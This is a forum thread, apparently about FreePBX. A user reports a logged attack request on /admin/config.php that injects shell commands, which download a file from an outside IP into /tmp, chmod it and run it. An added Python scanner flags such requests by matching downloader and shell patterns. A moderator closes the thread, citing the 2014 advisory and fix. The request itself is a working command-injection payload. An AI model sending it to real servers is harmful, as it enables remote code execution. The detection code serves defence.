Admin portal hackable to download and execute files in /tmp

Found in http logs:

“GET /admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20sup;wget%20http%3A%2F%2F162.213.24.40%2Fbesh%20-O%20%2Ftmp%2Ftoplel%3B%20chmod%20777%20%2Ftmp%2Ftoplel%3B%20%2Ftmp%2Ftoplel%3B HTTP/1.1” 200 345 “-” “Python-urllib/2.7”

This downloads a script file into /tmp/

toplel is a script that downloads another program, chmod 777s it and runs it!

System Hacked!

Francesco TheCalle Callegaro
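A way to spot this pattern in your own HTTP access logs, as an added example that is not part of the post above: it parses each request line, decodes the query string of /admin/config.php requests and flags the api handler calling function=system, shell metacharacters or downloaders in args, and writes to /tmp. The log format and sample lines are assumed (combined log format; the first sample repeats the request from the post, the others are constructed).

```python
"""Flag FreePBX /admin/config.php requests that carry an OS command.

Added example, not code from the post or from FreePBX. Assumes
Apache/nginx combined log format with the request in quotes.
"""
import re
from urllib.parse import unquote

# Request line inside straight or curly quotes, as logs are often pasted.
LOG_RE = re.compile(r'["\u201c](?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+["\u201d]')
# Command separators plus the downloaders/permission tools seen in the post.
SHELL_META = re.compile(r'[;|&`$]|\b(?:wget|curl|chmod|sh|bash)\b')

def parse_query(query):
    """Split a query string on '&' and percent-decode keys and values."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def classify_request(log_line):
    """Return the reasons a line looks like config.php command abuse ([] if clean)."""
    m = LOG_RE.search(log_line)
    if not m:
        return []
    path, _, query = m.group("target").partition("?")
    if path != "/admin/config.php":
        return []
    q = parse_query(query)
    reasons = []
    if q.get("handler") == "api" and q.get("function") == "system":
        reasons.append("api handler invoking function=system")
    args = q.get("args", "")
    if SHELL_META.search(args):
        reasons.append("shell metacharacters or downloader in args")
    if "/tmp/" in args:
        reasons.append("writes to /tmp")
    return reasons

def scan(lines):
    """Return (line, reasons) for every suspicious line in an iterable of log lines."""
    return [(line, r) for line in lines for r in [classify_request(line)] if r]

# Constructed sample log (client IP and timestamp are made up; request 1 is from the post).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Feb/2014:10:15:32 +0000] "GET /admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20sup;wget%20http%3A%2F%2F162.213.24.40%2Fbesh%20-O%20%2Ftmp%2Ftoplel%3B%20chmod%20777%20%2Ftmp%2Ftoplel%3B%20%2Ftmp%2Ftoplel%3B HTTP/1.1" 200 345 "-" "Python-urllib/2.7"',
    '192.0.2.11 - - [06/Feb/2014:10:16:01 +0000] "GET /admin/config.php?display=extensions HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [06/Feb/2014:10:16:05 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG):
        print(line.split('"')[1], "->", "; ".join(reasons))
```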

Discussed at length in February. http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice

Along with the fix and CVE and several announcements.

I am locking this thread because, as I said, it’s been discussed at length and is nothing new.